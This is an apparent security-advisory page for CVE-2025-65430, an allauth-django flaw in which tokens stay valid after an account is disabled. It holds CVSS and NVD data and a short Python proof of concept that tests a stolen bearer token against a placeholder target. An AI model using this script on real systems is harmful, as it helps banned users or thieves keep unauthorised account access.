Security Vulnerability Report
中文
CVE-2025-65430 CVSS 5.4 MEDIUM

CVE-2025-65430

Published: 2025-12-15 14:15:57
Last Modified: 2026-01-20 19:02:35
Source: [email protected]

Description

An issue was discovered in allauth-django before 65.13.0. IdP: marking a user as is_active=False after having handed tokens for that user while the account was still active had no effect. Fixed the access/refresh tokens are now rejected.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:allauth:allauth:*:*:*:*:*:django:*:* - VULNERABLE
allauth-django < 65.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-65430 PoC - allauth-django Token Invalidation Bypass # This PoC demonstrates that disabled user tokens remain valid TARGET_URL = "https://vulnerable-app.com" VICTIM_TOKEN = "your_stolen_or_acquired_access_token" def check_token_validity(token): """ Check if a token is still valid after user is disabled """ headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } response = requests.get(f"{TARGET_URL}/accounts/user/", headers=headers) if response.status_code == 200: print("[!] Token is still VALID - Vulnerability confirmed!") print(f"[+] Response: {response.json()}") return True elif response.status_code == 401: print("[+] Token is properly rejected - Fixed version") return False else: print(f"[-] Unexpected response: {response.status_code}") return None def exploit(): """ Exploit script for CVE-2025-65430 Steps: 1. Obtain valid token from active user 2. Wait for user account to be disabled (is_active=False) 3. Use the same token - it should be rejected but isn't """ print("[*] CVE-2025-65430 Exploitation Test") print("[*] Target: allauth-django < 65.13.0") # Test if token remains valid after user disable result = check_token_validity(VICTIM_TOKEN) if result: print("\n[!] VULNERABLE: Disabled user's token is still accepted") print("[*] This allows attackers to maintain access after being banned") if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65430", "sourceIdentifier": "[email protected]", "published": "2025-12-15T14:15:57.017", "lastModified": "2026-01-20T19:02:34.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in allauth-django before 65.13.0. IdP: marking a user as is_active=False after having handed tokens for that user while the account was still active had no effect. Fixed the access/refresh tokens are now rejected."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:allauth:allauth:*:*:*:*:*:django:*:*", "versionEndExcluding": "65.13.0", "matchCriteriaId": "64041413-AFF0-4ABD-9781-3F59ACEFE49C"}]}]}], "references": [{"url": "https://allauth.org/news/2025/10/django-allauth-65.13.0-released/", "source": "[email protected]", "tags": ["Release Notes"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.